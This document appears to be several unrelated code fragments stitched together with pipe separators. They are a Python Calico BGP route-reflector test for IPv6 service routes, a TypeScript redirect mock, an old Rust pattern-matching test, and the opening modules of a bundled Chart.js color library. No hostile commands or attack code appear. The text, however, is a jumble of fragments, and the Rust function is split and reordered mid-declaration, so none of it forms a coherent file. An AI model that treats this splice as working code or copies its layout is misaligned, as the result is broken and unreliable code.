name: nginx-rr
namespace: bgp-test
labels:
app: nginx
run: nginx-rr
spec:
ipFamilies:
- IPv6
externalIPs:
- fd5f:1234:175:200::1
ports:
- port: 80
targetPort: 80
selector:
app: nginx
run: nginx-rr
type: NodePort
externalTrafficPolicy: Local
EOF
""" % self.nodes[1])
calicoctl("get nodes -o yaml")
calicoctl("get bgppeers -o yaml")
calicoctl("get bgpconfigs -o yaml")
# Update node-2 to behave as a route reflector
json_str = calicoctl("get node %s -o json" % self.nodes[2])
node_dict = json.loads(json_str)
node_dict['metadata']['labels']['i-am-a-route-reflector'] = 'true'
node_dict['spec']['bgp']['routeReflectorClusterID'] = '224.0.0.1'
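# Note: the routeReflectorClusterID is a 32-bit value conventionally written
# in IPv4 dotted-quad notation (RFC 4456), even in an IPv6-only cluster.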
calicoctl("""apply -f - << EOF
%s
EOF
""" % json.dumps(node_dict))
# Disable node-to-node mesh, add cluster and external IP CIDRs to
# advertise, and configure BGP peering between the cluster nodes and the
# RR. (The BGP peering from the external node to the RR is included in
# get_bird_conf() above.)
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
nodeToNodeMeshEnabled: false
asNumber: 64512
serviceClusterIPs:
- cidr: fd00:10:96::/112
serviceExternalIPs:
- cidr: fd5f:1234:175:200::/112
EOF
""")
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPPeer
metadata: {name: peer-with-rr}
spec:
peerIP: %s
asNumber: 64512
EOF
""" % self.ipv6s[2])
svc_json = kubectl("get svc nginx-rr -n bgp-test -o json")
svc_dict = json.loads(svc_json)
cluster_ip = svc_dict['spec']['clusterIP']
external_ip = svc_dict['spec']['externalIPs'][0]
retry_until_success(lambda: self.assertIn(cluster_ip, self.get_routes()))
retry_until_success(lambda: self.assertIn(external_ip, self.get_routes())) | for cip in cluster_ips: |
redirect.mock.ts | import { Consumer } from "../../consumer/entity/consumer.entity";
| }
} | export class MockRedirectRepository {
public url(redirect_url: string, consumer: Consumer) {
expect(redirect_url).toEqual("test123.com");
expect(consumer).toBeInstanceOf(Consumer); |
borrowed-ptr-pattern-option.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
fn select(x: &r/Option<int>, y: &r/Option<int>) -> &r/Option<int> {
match (x, y) {
(&None, &None) => x,
(&Some(_), _) => x,
(&None, &Some(_)) => y
}
}
pub fn | () {
let x = None;
let y = Some(3);
assert select(&x, &y).get() == 3;
} | main |
Chart.js | /*!
* Chart.js
* http://chartjs.org/
* Version: 2.4.0
*
* Copyright 2016 Nick Downie
* Released under the MIT license
* https://github.com/chartjs/Chart.js/blob/master/LICENSE.md
*/
(function (f) {
if (typeof exports === "object" && typeof module !== "undefined") {
module.exports = f()
} else if (typeof define === "function" && define.amd) {
define([], f)
} else {
var g;
if (typeof window !== "undefined") {
g = window
} else if (typeof global !== "undefined") {
g = global
} else if (typeof self !== "undefined") {
g = self
} else {
g = this
}
g.Chart = f()
}
})(function () {
var define, module, exports;
return (function e(t, n, r) {
function s(o, u) {
if (!n[o]) {
if (!t[o]) {
var a = typeof require == "function" && require;
if (!u && a)return a(o, !0);
if (i)return i(o, !0);
var f = new Error("Cannot find module '" + o + "'");
throw f.code = "MODULE_NOT_FOUND", f
}
var l = n[o] = {exports: {}};
t[o][0].call(l.exports, function (e) {
var n = t[o][1][e];
return s(n ? n : e)
}, l, l.exports, e, t, n, r)
}
return n[o].exports
}
var i = typeof require == "function" && require;
for (var o = 0; o < r.length; o++)s(r[o]);
return s
})({
1: [function (require, module, exports) {
}, {}], 2: [function (require, module, exports) {
/* MIT license */
var colorNames = require(6);
module.exports = {
getRgba: getRgba,
getHsla: getHsla,
getRgb: getRgb,
getHsl: getHsl,
getHwb: getHwb,
getAlpha: getAlpha,
hexString: hexString,
rgbString: rgbString,
rgbaString: rgbaString,
percentString: percentString,
percentaString: percentaString,
hslString: hslString,
hslaString: hslaString,
hwbString: hwbString,
keyword: keyword
}
function getRgba(string) {
if (!string) {
return;
}
var abbr = /^#([a-fA-F0-9]{3})$/,
hex = /^#([a-fA-F0-9]{6})$/,
rgba = /^rgba?\(\s*([+-]?\d+)\s*,\s*([+-]?\d+)\s*,\s*([+-]?\d+)\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)$/,
per = /^rgba?\(\s*([+-]?[\d\.]+)\%\s*,\s*([+-]?[\d\.]+)\%\s*,\s*([+-]?[\d\.]+)\%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)$/,
keyword = /(\w+)/;
var rgb = [0, 0, 0],
a = 1,
match = string.match(abbr);
if (match) {
match = match[1];
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match[i] + match[i], 16);
}
}
else if (match = string.match(hex)) {
match = match[1];
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match.slice(i * 2, i * 2 + 2), 16);
}
}
else if (match = string.match(rgba)) {
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match[i + 1]);
}
a = parseFloat(match[4]);
}
else if (match = string.match(per)) {
for (var i = 0; i < rgb.length; i++) {
rgb[i] = Math.round(parseFloat(match[i + 1]) * 2.55);
}
a = parseFloat(match[4]);
}
else if (match = string.match(keyword)) {
if (match[1] == "transparent") {
return [0, 0, 0, 0];
}
rgb = colorNames[match[1]];
if (!rgb) {
return;
}
}
for (var i = 0; i < rgb.length; i++) {
rgb[i] = scale(rgb[i], 0, 255);
}
if (!a && a != 0) {
a = 1;
}
else {
a = scale(a, 0, 1);
}
rgb[3] = a;
return rgb;
}
function getHsla(string) {
if (!string) {
return;
}
var hsl = /^hsla?\(\s*([+-]?\d+)(?:deg)?\s*,\s*([+-]?[\d\.]+)%\s*,\s*([+-]?[\d\.]+)%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)/;
var match = string.match(hsl);
if (match) {
var alpha = parseFloat(match[4]);
var h = scale(parseInt(match[1]), 0, 360),
s = scale(parseFloat(match[2]), 0, 100),
l = scale(parseFloat(match[3]), 0, 100),
a = scale(isNaN(alpha) ? 1 : alpha, 0, 1);
return [h, s, l, a];
}
}
function getHwb(string) {
if (!string) {
return;
}
var hwb = /^hwb\(\s*([+-]?\d+)(?:deg)?\s*,\s*([+-]?[\d\.]+)%\s*,\s*([+-]?[\d\.]+)%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)/;
var match = string.match(hwb);
if (match) {
var alpha = parseFloat(match[4]);
var h = scale(parseInt(match[1]), 0, 360),
w = scale(parseFloat(match[2]), 0, 100),
b = scale(parseFloat(match[3]), 0, 100),
a = scale(isNaN(alpha) ? 1 : alpha, 0, 1);
return [h, w, b, a];
}
}
function getRgb(string) {
var rgba = getRgba(string);
return rgba && rgba.slice(0, 3);
}
function getHsl(string) {
var hsla = getHsla(string);
return hsla && hsla.slice(0, 3);
}
function getAlpha(string) {
var vals = getRgba(string);
if (vals) {
return vals[3];
}
else if (vals = getHsla(string)) {
return vals[3];
}
else if (vals = getHwb(string)) {
return vals[3];
}
}
// generators
function hexString(rgb) {
return "#" + hexDouble(rgb[0]) + hexDouble(rgb[1])
+ hexDouble(rgb[2]);
}
function rgbString(rgba, alpha) {
if (alpha < 1 || (rgba[3] && rgba[3] < 1)) {
return rgbaString(rgba, alpha);
}
return "rgb(" + rgba[0] + ", " + rgba[1] + ", " + rgba[2] + ")";
}
function rgbaString(rgba, alpha) {
if (alpha === undefined) {
alpha = (rgba[3] !== undefined ? rgba[3] : 1);
}
return "rgba(" + rgba[0] + ", " + rgba[1] + ", " + rgba[2]
+ ", " + alpha + ")";
}
function percentString(rgba, alpha) {
if (alpha < 1 || (rgba[3] && rgba[3] < 1)) {
return percentaString(rgba, alpha);
}
var r = Math.round(rgba[0] / 255 * 100),
g = Math.round(rgba[1] / 255 * 100),
b = Math.round(rgba[2] / 255 * 100);
return "rgb(" + r + "%, " + g + "%, " + b + "%)";
}
function percentaString(rgba, alpha) {
var r = Math.round(rgba[0] / 255 * 100),
g = Math.round(rgba[1] / 255 * 100),
b = Math.round(rgba[2] / 255 * 100);
return "rgba(" + r + "%, " + g + "%, " + b + "%, " + (alpha || rgba[3] || 1) + ")";
}
function hslString(hsla, alpha) {
if (alpha < 1 || (hsla[3] && hsla[3] < 1)) {
return hslaString(hsla, alpha);
}
return "hsl(" + hsla[0] + ", " + hsla[1] + "%, " + hsla[2] + "%)";
}
function hslaString(hsla, alpha) {
if (alpha === undefined) {
alpha = (hsla[3] !== undefined ? hsla[3] : 1);
}
return "hsla(" + hsla[0] + ", " + hsla[1] + "%, " + hsla[2] + "%, "
+ alpha + ")";
}
// hwb is a bit different from rgb(a) & hsl(a) since there is no alpha-specific syntax
// (hwb has an optional alpha; 1 is the default value)
function hwbString(hwb, alpha) {
if (alpha === undefined) {
alpha = (hwb[3] !== undefined ? hwb[3] : 1);
}
return "hwb(" + hwb[0] + ", " + hwb[1] + "%, " + hwb[2] + "%"
+ (alpha !== undefined && alpha !== 1 ? ", " + alpha : "") + ")";
}
function keyword(rgb) {
return reverseNames[rgb.slice(0, 3)];
}
// helpers
function scale(num, min, max) {
return Math.min(Math.max(min, num), max);
}
function hexDouble(num) {
var str = num.toString(16).toUpperCase();
return (str.length < 2) ? "0" + str : str;
}
//create a list of reverse color names
var reverseNames = {};
for (var name in colorNames) {
reverseNames[colorNames[name]] = name;
}
}, {"6": 6}], 3: [function (require, module, exports) {
/* MIT license */
var convert = require(5);
var string = require(2);
var Color = function (obj) {
if (obj instanceof Color) {
return obj;
}
if (!(this instanceof Color)) {
return new Color(obj);
}
this.values = {
rgb: [0, 0, 0],
hsl: [0, 0, 0],
hsv: [0, 0, 0],
hwb: [0, 0, 0],
cmyk: [0, 0, 0, 0],
alpha: 1
};
// parse Color() argument
var vals;
if (typeof obj === 'string') {
vals = string.getRgba(obj);
if (vals) {
this.setValues('rgb', vals);
} else if (vals = string.getHsla(obj)) {
this.setValues('hsl', vals);
} else if (vals = string.getHwb(obj)) {
this.setValues('hwb', vals);
} else {
throw new Error('Unable to parse color from string "' + obj + '"');
}
} else if (typeof obj === 'object') {
vals = obj;
if (vals.r !== undefined || vals.red !== undefined) {
this.setValues('rgb', vals);
} else if (vals.l !== undefined || vals.lightness !== undefined) {
this.setValues('hsl', vals);
} else if (vals.v !== undefined || vals.value !== undefined) {
this.setValues('hsv', vals);
} else if (vals.w !== undefined || vals.whiteness !== undefined) {
this.setValues('hwb', vals);
} else if (vals.c !== undefined || vals.cyan !== undefined) {
this.setValues('cmyk', vals);
} else {
throw new Error('Unable to parse color from object ' + JSON.stringify(obj));
}
}
};
Color.prototype = {
rgb: function () {
return this.setSpace('rgb', arguments);
},
hsl: function () {
return this.setSpace('hsl', arguments);
},
hsv: function () {
return this.setSpace('hsv', arguments);
},
hwb: function () {
return this.setSpace('hwb', arguments);
},
cmyk: function () {
return this.setSpace('cmyk', arguments);
},
rgbArray: function () {
return this.values.rgb;
},
hslArray: function () {
return this.values.hsl;
},
hsvArray: function () {
return this.values.hsv;
},
hwbArray: function () {
var values = this.values;
if (values.alpha !== 1) {
return values.hwb.concat([values.alpha]);
}
return values.hwb;
},
cmykArray: function () {
return this.values.cmyk;
},
rgbaArray: function () {
var values = this.values;
return values.rgb.concat([values.alpha]);
},
hslaArray: function () {
var values = this.values;
return values.hsl.concat([values.alpha]);
},
alpha: function (val) {
if (val === undefined) {
return this.values.alpha;
}
this.setValues('alpha', val);
return this;
},
red: function (val) {
return this.setChannel('rgb', 0, val);
},
green: function (val) {
return this.setChannel('rgb', 1, val);
},
blue: function (val) {
return this.setChannel('rgb', 2, val);
},
hue: function (val) {
if (val) {
val %= 360;
val = val < 0 ? 360 + val : val;
}
return this.setChannel('hsl', 0, val);
},
saturation: function (val) {
return this.setChannel('hsl', 1, val);
},
lightness: function (val) {
return this.setChannel('hsl', 2, val);
},
saturationv: function (val) {
return this.setChannel('hsv', 1, val);
},
whiteness: function (val) {
return this.setChannel('hwb', 1, val);
},
blackness: function (val) {
return this.setChannel('hwb', 2, val);
},
value: function (val) {
return this.setChannel('hsv', 2, val);
},
cyan: function (val) {
return this.setChannel('cmyk', 0, val);
},
magenta: function (val) {
return this.setChannel('cmyk', 1, val);
},
yellow: function (val) {
return this.setChannel('cmyk', 2, val);
},
black: function (val) {
return this.setChannel('cmyk', 3, val);
},
hexString: function () {
return string.hexString(this.values.rgb);
},
rgbString: function () {
return string.rgbString(this.values.rgb, this.values.alpha);
},
rgbaString: function () {
return string.rgbaString(this.values.rgb, this.values.alpha);
},
percentString: function () {
return string.percentString(this.values.rgb, this.values.alpha);
},
hslString: function () {
return string.hslString(this.values.hsl, this.values.alpha);
},
hslaString: function () {
return string.hslaString(this.values.hsl, this.values.alpha);
},
hwbString: function () {
return string.hwbString(this.values.hwb, this.values.alpha);
},
keyword: function () {
return string.keyword(this.values.rgb, this.values.alpha);
},
rgbNumber: function () {
var rgb = this.values.rgb;
return (rgb[0] << 16) | (rgb[1] << 8) | rgb[2];
},
luminosity: function () {
// http://www.w3.org/TR/WCAG20/#relativeluminancedef
var rgb = this.values.rgb;
var lum = [];
for (var i = 0; i < rgb.length; i++) {
var chan = rgb[i] / 255;
lum[i] = (chan <= 0.03928) ? chan / 12.92 : Math.pow(((chan + 0.055) / 1.055), 2.4);
}
return 0.2126 * lum[0] + 0.7152 * lum[1] + 0.0722 * lum[2];
},
contrast: function (color2) {
// http://www.w3.org/TR/WCAG20/#contrast-ratiodef
var lum1 = this.luminosity();
var lum2 = color2.luminosity();
if (lum1 > lum2) {
return (lum1 + 0.05) / (lum2 + 0.05);
}
return (lum2 + 0.05) / (lum1 + 0.05);
},
level: function (color2) {
var contrastRatio = this.contrast(color2);
if (contrastRatio >= 7.1) {
return 'AAA';
}
return (contrastRatio >= 4.5) ? 'AA' : '';
},
dark: function () {
// YIQ equation from http://24ways.org/2010/calculating-color-contrast
var rgb = this.values.rgb;
var yiq = (rgb[0] * 299 + rgb[1] * 587 + rgb[2] * 114) / 1000;
return yiq < 128;
},
light: function () {
return !this.dark();
},
negate: function () {
var rgb = [];
for (var i = 0; i < 3; i++) {
rgb[i] = 255 - this.values.rgb[i];
}
this.setValues('rgb', rgb);
return this;
},
lighten: function (ratio) {
var hsl = this.values.hsl;
hsl[2] += hsl[2] * ratio;
this.setValues('hsl', hsl);
return this;
},
darken: function (ratio) {
var hsl = this.values.hsl;
hsl[2] -= hsl[2] * ratio;
this.setValues('hsl', hsl);
return this;
},
saturate: function (ratio) {
var hsl = this.values.hsl;
hsl[1] += hsl[1] * ratio;
this.setValues('hsl', hsl);
return this;
},
desaturate: function (ratio) {
var hsl = this.values.hsl;
hsl[1] -= hsl[1] * ratio;
this.setValues('hsl', hsl);
return this;
},
whiten: function (ratio) {
var hwb = this.values.hwb;
hwb[1] += hwb[1] * ratio;
this.setValues('hwb', hwb);
return this;
},
blacken: function (ratio) {
var hwb = this.values.hwb;
hwb[2] += hwb[2] * ratio;
this.setValues('hwb', hwb);
return this;
},
greyscale: function () {
var rgb = this.values.rgb;
// http://en.wikipedia.org/wiki/Grayscale#Converting_color_to_grayscale
var val = rgb[0] * 0.3 + rgb[1] * 0.59 + rgb[2] * 0.11;
this.setValues('rgb', [val, val, val]);
return this;
},
clearer: function (ratio) {
var alpha = this.values.alpha;
this.setValues('alpha', alpha - (alpha * ratio));
return this;
},
opaquer: function (ratio) {
var alpha = this.values.alpha;
this.setValues('alpha', alpha + (alpha * ratio));
return this;
},
rotate: function (degrees) {
var hsl = this.values.hsl;
var hue = (hsl[0] + degrees) % 360;
hsl[0] = hue < 0 ? 360 + hue : hue;
this.setValues('hsl', hsl);
return this;
},
/**
* Ported from sass implementation in C
* https://github.com/sass/libsass/blob/0e6b4a2850092356aa3ece07c6b249f0221caced/functions.cpp#L209
*/
mix: function (mixinColor, weight) {
var color1 = this;
var color2 = mixinColor;
var p = weight === undefined ? 0.5 : weight;
var w = 2 * p - 1;
var a = color1.alpha() - color2.alpha();
var w1 = (((w * a === -1) ? w : (w + a) / (1 + w * a)) + 1) / 2.0;
var w2 = 1 - w1;
return this
.rgb(
w1 * color1.red() + w2 * color2.red(),
w1 * color1.green() + w2 * color2.green(),
w1 * color1.blue() + w2 * color2.blue()
)
.alpha(color1.alpha() * p + color2.alpha() * (1 - p));
},
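// Illustrative sketch: with equal alphas and the default weight of 0.5, the
// sass weighting collapses to a plain channel average. Note that mix()
// mutates the receiver rather than returning a new color:
//   var red = new Color('rgb(255, 0, 0)');
//   red.mix(new Color('rgb(0, 0, 255)')).rgbString(); // => 'rgb(128, 0, 128)'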
toJSON: function () {
return this.rgb();
},
clone: function () {
// NOTE(SB): using node-clone creates a dependency to Buffer when using browserify,
// making the final build way too big to embed in Chart.js. So let's do it manually,
// assuming that values to clone are 1 dimension arrays containing only numbers,
// except 'alpha' which is a number.
var result = new Color();
var source = this.values;
var target = result.values;
var value, type;
for (var prop in source) {
if (source.hasOwnProperty(prop)) {
value = source[prop];
type = ({}).toString.call(value);
if (type === '[object Array]') {
target[prop] = value.slice(0);
} else if (type === '[object Number]') {
target[prop] = value;
} else {
console.error('unexpected color value:', value);
}
}
}
return result;
}
};
Color.prototype.spaces = {
rgb: ['red', 'green', 'blue'],
hsl: ['hue', 'saturation', 'lightness'],
hsv: ['hue', 'saturation', 'value'],
hwb: ['hue', 'whiteness', 'blackness'],
cmyk: ['cyan', 'magenta', 'yellow', 'black']
};
Color.prototype.maxes = {
rgb: [255, 255, 255],
hsl: [360, 100, 100],
hsv: [360, 100, 100],
hwb: [360, 100, 100],
cmyk: [100, 100, 100, 100]
};
Color.prototype.getValues = function (space) {
var values = this.values;
var vals = {};
for (var i = 0; i < space.length; i++) {
vals[space.charAt(i)] = values[space][i];
}
if (values.alpha !== 1) {
vals.a = values.alpha;
}
// {r: 255, g: 255, b: 255, a: 0.4}
return vals;
};
Color.prototype.setValues = function (space, vals) {
var values = this.values;
var spaces = this.spaces;
var maxes = this.maxes;
var alpha = 1;
var i;
if (space === 'alpha') {
alpha = vals;
} else if (vals.length) {
// [10, 10, 10]
values[space] = vals.slice(0, space.length);
alpha = vals[space.length];
} else if (vals[space.charAt(0)] !== undefined) {
// {r: 10, g: 10, b: 10}
for (i = 0; i < space.length; i++) {
values[space][i] = vals[space.charAt(i)];
}
alpha = vals.a;
} else if (vals[spaces[space][0]] !== undefined) {
// {red: 10, green: 10, blue: 10}
var chans = spaces[space];
for (i = 0; i < space.length; i++) {
values[space][i] = vals[chans[i]];
}
alpha = vals.alpha;
}
values.alpha = Math.max(0, Math.min(1, (alpha === undefined ? values.alpha : alpha)));
if (space === 'alpha') {
return false;
}
var capped;
// cap values of the space prior to converting all values
for (i = 0; i < space.length; i++) {
capped = Math.max(0, Math.min(maxes[space][i], values[space][i]));
values[space][i] = Math.round(capped);
}
// convert to all the other color spaces
for (var sname in spaces) {
if (sname !== space) {
values[sname] = convert[space][sname](values[space]);
}
}
return true;
};
Color.prototype.setSpace = function (space, args) {
var vals = args[0];
if (vals === undefined) {
// color.rgb()
return this.getValues(space);
}
// color.rgb(10, 10, 10)
if (typeof vals === 'number') {
vals = Array.prototype.slice.call(args);
}
this.setValues(space, vals);
return this;
};
Color.prototype.setChannel = function (space, index, val) {
var svalues = this.values[space];
if (val === undefined) {
// color.red()
return svalues[index];
} else if (val === svalues[index]) {
// color.red(color.red())
return this;
}
// color.red(100)
svalues[index] = val;
this.setValues(space, svalues);
return this;
};
if (typeof window !== 'undefined') {
window.Color = Color;
}
module.exports = Color;
}, {"2": 2, "5": 5}], 4: [function (require, module, exports) {
/* MIT license */
module.exports = {
rgb2hsl: rgb2hsl,
rgb2hsv: rgb2hsv,
rgb2hwb: rgb2hwb,
rgb2cmyk: rgb2cmyk,
rgb2keyword: rgb2keyword,
rgb2xyz: rgb2xyz,
rgb2lab: rgb2lab,
rgb2lch: rgb2lch,
hsl2rgb: hsl2rgb,
hsl2hsv: hsl2hsv,
hsl2hwb: hsl2hwb,
hsl2cmyk: hsl2cmyk,
hsl2keyword: hsl2keyword,
hsv2rgb: hsv2rgb,
hsv2hsl: hsv2hsl,
hsv2hwb: hsv2hwb,
hsv2cmyk: hsv2cmyk,
hsv2keyword: hsv2keyword,
hwb2rgb: hwb2rgb,
hwb2hsl: hwb2hsl,
hwb2hsv: hwb2hsv,
hwb2cmyk: hwb2cmyk,
hwb2keyword: hwb2keyword,
cmyk2rgb: cmyk2rgb,
cmyk2hsl: cmyk2hsl,
cmyk2hsv: cmyk2hsv,
cmyk2hwb: cmyk2hwb,
cmyk2keyword: cmyk2keyword,
keyword2rgb: keyword2rgb,
keyword2hsl: keyword2hsl,
keyword2hsv: keyword2hsv,
keyword2hwb: keyword2hwb,
keyword2cmyk: keyword2cmyk,
keyword2lab: keyword2lab,
keyword2xyz: keyword2xyz,
xyz2rgb: xyz2rgb,
xyz2lab: xyz2lab,
xyz2lch: xyz2lch,
lab2xyz: lab2xyz,
lab2rgb: lab2rgb,
lab2lch: lab2lch,
lch2lab: lch2lab,
lch2xyz: lch2xyz,
lch2rgb: lch2rgb
};
function rgb2hsl(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255,
min = Math.min(r, g, b),
max = Math.max(r, g, b),
delta = max - min,
h, s, l;
if (max == min)
h = 0;
else if (r == max)
h = (g - b) / delta;
else if (g == max)
h = 2 + (b - r) / delta;
else if (b == max)
h = 4 + (r - g) / delta;
h = Math.min(h * 60, 360);
if (h < 0)
h += 360;
l = (min + max) / 2;
if (max == min)
s = 0;
else if (l <= 0.5)
s = delta / (max + min);
else
s = delta / (2 - max - min);
return [h, s * 100, l * 100];
}
function rgb2hsv(rgb) {
var r = rgb[0],
g = rgb[1],
b = rgb[2],
min = Math.min(r, g, b),
max = Math.max(r, g, b),
delta = max - min,
h, s, v;
if (max == 0)
s = 0;
else
s = (delta / max * 1000) / 10;
if (max == min)
h = 0;
else if (r == max)
h = (g - b) / delta;
else if (g == max)
h = 2 + (b - r) / delta;
else if (b == max)
h = 4 + (r - g) / delta;
h = Math.min(h * 60, 360);
if (h < 0)
h += 360;
v = ((max / 255) * 1000) / 10;
return [h, s, v];
}
function rgb2hwb(rgb) {
var r = rgb[0],
g = rgb[1],
b = rgb[2],
h = rgb2hsl(rgb)[0],
w = 1 / 255 * Math.min(r, Math.min(g, b)),
bl = 1 - 1 / 255 * Math.max(r, Math.max(g, b));
return [h, w * 100, bl * 100];
}
function rgb2cmyk(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255,
c, m, y, k;
k = Math.min(1 - r, 1 - g, 1 - b);
c = (1 - r - k) / (1 - k) || 0;
m = (1 - g - k) / (1 - k) || 0;
y = (1 - b - k) / (1 - k) || 0;
return [c * 100, m * 100, y * 100, k * 100];
}
function rgb2keyword(rgb) {
return reverseKeywords[JSON.stringify(rgb)];
}
function rgb2xyz(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255;
// assume sRGB
r = r > 0.04045 ? Math.pow(((r + 0.055) / 1.055), 2.4) : (r / 12.92);
g = g > 0.04045 ? Math.pow(((g + 0.055) / 1.055), 2.4) : (g / 12.92);
b = b > 0.04045 ? Math.pow(((b + 0.055) / 1.055), 2.4) : (b / 12.92);
var x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805);
var y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722);
var z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505);
return [x * 100, y * 100, z * 100];
}
function rgb2lab(rgb) {
var xyz = rgb2xyz(rgb),
x = xyz[0],
y = xyz[1],
z = xyz[2],
l, a, b;
x /= 95.047;
y /= 100;
z /= 108.883;
x = x > 0.008856 ? Math.pow(x, 1 / 3) : (7.787 * x) + (16 / 116);
y = y > 0.008856 ? Math.pow(y, 1 / 3) : (7.787 * y) + (16 / 116);
z = z > 0.008856 ? Math.pow(z, 1 / 3) : (7.787 * z) + (16 / 116);
l = (116 * y) - 16;
a = 500 * (x - y);
b = 200 * (y - z);
return [l, a, b];
}
function rgb2lch(args) {
return lab2lch(rgb2lab(args));
}
function hsl2rgb(hsl) {
var h = hsl[0] / 360,
s = hsl[1] / 100,
l = hsl[2] / 100,
t1, t2, t3, rgb, val;
if (s == 0) {
val = l * 255;
return [val, val, val];
}
if (l < 0.5)
t2 = l * (1 + s);
else
t2 = l + s - l * s;
t1 = 2 * l - t2;
rgb = [0, 0, 0];
for (var i = 0; i < 3; i++) {
t3 = h + 1 / 3 * -(i - 1);
t3 < 0 && t3++;
t3 > 1 && t3--;
if (6 * t3 < 1)
val = t1 + (t2 - t1) * 6 * t3;
else if (2 * t3 < 1)
val = t2;
else if (3 * t3 < 2)
val = t1 + (t2 - t1) * (2 / 3 - t3) * 6;
else
val = t1;
rgb[i] = val * 255;
}
return rgb;
}
function hsl2hsv(hsl) {
var h = hsl[0],
s = hsl[1] / 100,
l = hsl[2] / 100,
sv, v;
if (l === 0) {
// no need to do calc on black
// also avoids divide by 0 error
return [0, 0, 0];
}
l *= 2;
s *= (l <= 1) ? l : 2 - l;
v = (l + s) / 2;
sv = (2 * s) / (l + s);
return [h, sv * 100, v * 100];
}
function hsl2hwb(args) {
return rgb2hwb(hsl2rgb(args));
}
function hsl2cmyk(args) {
return rgb2cmyk(hsl2rgb(args));
}
function hsl2keyword(args) {
return rgb2keyword(hsl2rgb(args));
}
function hsv2rgb(hsv) {
var h = hsv[0] / 60,
s = hsv[1] / 100,
v = hsv[2] / 100,
hi = Math.floor(h) % 6;
var f = h - Math.floor(h),
p = 255 * v * (1 - s),
q = 255 * v * (1 - (s * f)),
t = 255 * v * (1 - (s * (1 - f))),
v = 255 * v;
switch (hi) {
case 0:
return [v, t, p];
case 1:
return [q, v, p];
case 2:
return [p, v, t];
case 3:
return [p, q, v];
case 4:
return [t, p, v];
case 5:
return [v, p, q];
}
}
function hsv2hsl(hsv) {
var h = hsv[0],
s = hsv[1] / 100,
v = hsv[2] / 100,
sl, l;
l = (2 - s) * v;
sl = s * v;
sl /= (l <= 1) ? l : 2 - l;
sl = sl || 0;
l /= 2;
return [h, sl * 100, l * 100];
}
function hsv2hwb(args) {
return rgb2hwb(hsv2rgb(args));
}
function hsv2cmyk(args) {
return rgb2cmyk(hsv2rgb(args));
}
function hsv2keyword(args) {
return rgb2keyword(hsv2rgb(args));
}
// http://dev.w3.org/csswg/css-color/#hwb-to-rgb
function hwb2rgb(hwb) {
var h = hwb[0] / 360,
wh = hwb[1] / 100,
bl = hwb[2] / 100,
ratio = wh + bl,
i, v, f, n, r, g, b;
// wh + bl can't be > 1
if (ratio > 1) {
wh /= ratio;
bl /= ratio;
}
i = Math.floor(6 * h);
v = 1 - bl;
f = 6 * h - i;
if ((i & 0x01) != 0) {
f = 1 - f;
}
n = wh + f * (v - wh); // linear interpolation
switch (i) {
default:
case 6:
case 0:
r = v;
g = n;
b = wh;
break;
case 1:
r = n;
g = v;
b = wh;
break;
case 2:
r = wh;
g = v;
b = n;
break;
case 3:
r = wh;
g = n;
b = v;
break;
case 4:
r = n;
g = wh;
b = v;
break;
case 5:
r = v;
g = wh;
b = n;
break;
}
return [r * 255, g * 255, b * 255];
}
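// Worked example of the CSS algorithm above: hwb2rgb([0, 0, 0]) has i = 0,
// v = 1, f = 0 and n = 0, so case 0 yields [255, 0, 0] (pure red). When
// whiteness + blackness exceeds 1, rescaling them to sum to 1 makes
// n = v = wh, i.e. the result collapses to a pure grey.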
function hwb2hsl(args) {
return rgb2hsl(hwb2rgb(args));
}
function hwb2hsv(args) {
return rgb2hsv(hwb2rgb(args));
}
function hwb2cmyk(args) {
return rgb2cmyk(hwb2rgb(args));
}
function hwb2keyword(args) {
return rgb2keyword(hwb2rgb(args));
}
function cmyk2rgb(cmyk) {
var c = cmyk[0] / 100,
m = cmyk[1] / 100,
y = cmyk[2] / 100,
k = cmyk[3] / 100,
r, g, b;
r = 1 - Math.min(1, c * (1 - k) + k);
g = 1 - Math.min(1, m * (1 - k) + k);
b = 1 - Math.min(1, y * (1 - k) + k);
return [r * 255, g * 255, b * 255];
}
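// Worked example (round-trips with rgb2cmyk above): cmyk2rgb([0, 100, 100, 0])
// gives r = 1 - min(1, 0) = 1 and g = b = 1 - min(1, 1) = 0, i.e. [255, 0, 0].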
function cmyk2hsl(args) {
return rgb2hsl(cmyk2rgb(args));
}
function cmyk2hsv(args) {
return rgb2hsv(cmyk2rgb(args));
}
function cmyk2hwb(args) {
return rgb2hwb(cmyk2rgb(args));
}
function cmyk2keyword(args) {
return rgb2keyword(cmyk2rgb(args));
}
function xyz2rgb(xyz) {
var x = xyz[0] / 100,
y = xyz[1] / 100,
z = xyz[2] / 100,
r, g, b;
r = (x * 3.2406) + (y * -1.5372) + (z * -0.4986);
g = (x * -0.9689) + (y * 1.8758) + (z * 0.0415);
b = (x * 0.0557) + (y * -0.2040) + (z * 1.0570);
// assume sRGB
r = r > 0.0031308 ? ((1.055 * Math.pow(r, 1.0 / 2.4)) - 0.055)
: r = (r * 12.92);
g = g > 0.0031308 ? ((1.055 * Math.pow(g, 1.0 / 2.4)) - 0.055)
: g = (g * 12.92);
b = b > 0.0031308 ? ((1.055 * Math.pow(b, 1.0 / 2.4)) - 0.055)
: b = (b * 12.92);
r = Math.min(Math.max(0, r), 1);
g = Math.min(Math.max(0, g), 1);
b = Math.min(Math.max(0, b), 1);
